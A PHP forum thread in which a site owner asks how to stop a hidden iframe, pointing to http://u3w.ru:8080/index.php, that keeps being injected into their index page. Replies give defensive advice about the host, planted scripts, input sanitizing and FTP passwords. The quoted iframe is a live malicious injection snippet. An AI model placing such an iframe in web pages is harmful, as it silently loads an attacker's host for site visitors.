code injection

PHP programming forum. Ask questions or help people concerning PHP code. Don't understand a function? Need help implementing a class? Don't understand a class? Here is where to ask. Remember to do your homework!

Moderator: General Moderators

Post Reply
User avatar
itsmani1
Forum Regular
Posts: 791
Joined: Mon Sep 29, 2003 2:26 am
Location: Islamabad Pakistan
Contact:

code injection

Post by itsmani1 »

some how following code gets inject to my index page. what should I do to stop it?
<iframe src="http://u3w.ru:8080/index.php" width=123 height=130 style="visibility: hidden"></iframe>
User avatar
McInfo
DevNet Resident
Posts: 1532
Joined: Wed Apr 01, 2009 1:31 pm

Re: code injection

Post by McInfo »

Inform your server administrator that the server is insecure.

Edit: This post was recovered from search engine cache.
Last edited by McInfo on Wed Jun 16, 2010 2:54 pm, edited 1 time in total.
User avatar
itsmani1
Forum Regular
Posts: 791
Joined: Mon Sep 29, 2003 2:26 am
Location: Islamabad Pakistan
Contact:

Re: code injection

Post by itsmani1 »

thanks for the reply

anything that should be done at my end?
User avatar
McInfo
DevNet Resident
Posts: 1532
Joined: Wed Apr 01, 2009 1:31 pm

Re: code injection

Post by McInfo »

Find the source of the HTML. If it is embedded in the index.php file, look through your scripts and make sure there aren't any that allow a user to modify files. If the iframe is generated dynamically, such as from data stored in a database, make sure all of your scripts sanitize incoming user data.

If you are on a shared-hosting server, it is likely that the attack came from someone you share the server with. That is why I suggested that you inform your server administrator. If they can't do anything for you, move to a more secure host.

Edit: This post was recovered from search engine cache.
Last edited by McInfo on Wed Jun 16, 2010 2:54 pm, edited 1 time in total.
Reviresco
Forum Contributor
Posts: 172
Joined: Tue Feb 19, 2008 4:18 pm
Location: Milwaukee

Re: code injection

Post by Reviresco »

Look through all your directories -- there is probably a malicious script hidden there somewhere that you didn't put there. Start with images folders.
joshj
Forum Newbie
Posts: 1
Joined: Tue Jul 14, 2009 12:16 am
Location: Sunnyvale

Re: code injection

Post by joshj »

i faced same problem earlier, i searched a lot and found that...it is some miscellaneous script that can automatically connect to your ftp and insert this code into all the index file hosted on root server.

I strongly recommend to scan your PC (from which you are connecting ftp), and change your ftp password. if you will not remove this script that Google will consider your website as a attack site and will remove from their index.

hope this will work,
Post Reply